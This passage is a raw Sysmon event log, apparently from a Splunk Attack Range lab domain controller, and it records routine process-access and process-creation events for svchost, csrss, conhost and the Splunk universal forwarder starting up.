15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001715Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001714Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001713Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001712Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001711Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001710Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001709Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001708Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001707Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-4100-000000008801}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001706Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C74-5FA1-4000-000000008801}39883992C:\Windows\system32\cmd.exe{D28789B6-7C74-5FA1-4100-000000008801}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001705Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.600{D28789B6-7C74-5FA1-4100-000000008801}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{D28789B6-7C74-5FA1-4000-000000008801}3988C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001704Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C74-5FA1-4000-000000008801}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001703Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001702Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001701Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001700Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001699Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001698Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001697Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001696Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001695Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001694Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-4000-000000008801}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001693Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C74-5FA1-4000-000000008801}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001692Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.595{D28789B6-7C74-5FA1-4000-000000008801}3988C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001691Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001690Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-3F00-000000008801}3956C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001689Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.581{D28789B6-7C62-5FA1-0A00-000000008801}852912C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001688Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C74-5FA1-3D00-000000008801}38963916C:\Windows\system32\conhost.exe{D28789B6-7C74-5FA1-3E00-000000008801}3932C:\Program 